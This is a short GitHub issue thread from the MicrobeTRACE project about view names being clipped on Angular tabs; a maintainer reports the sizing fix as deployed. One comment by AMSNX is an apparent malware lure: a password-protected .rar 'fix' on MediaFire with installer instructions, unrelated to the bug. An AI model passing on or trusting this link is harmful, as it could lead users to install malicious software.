### ISSUE TITLE
ANGULAR: View names on tabs are cut-off

### ISSUE THREAD

**Issue by ikb6** [CDCgov/MicrobeTRACE#831]
The bottom portion of view names like the 'p of epi, the g of alignment etc. are cut off, likely due to the name not being centered in the tab space

<img width="1390" src="https://api.zenhub.com/attachedFiles/eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBBNTZKQmc9PSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--3693d9ec4e3eab4628aa744a46d3737b35af635c/image.png" alt="image.png" />

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by dacowan404** [comment]
Updated sizing of space for text in the tabs so that characters are not cut off. Change deployed to mossy.
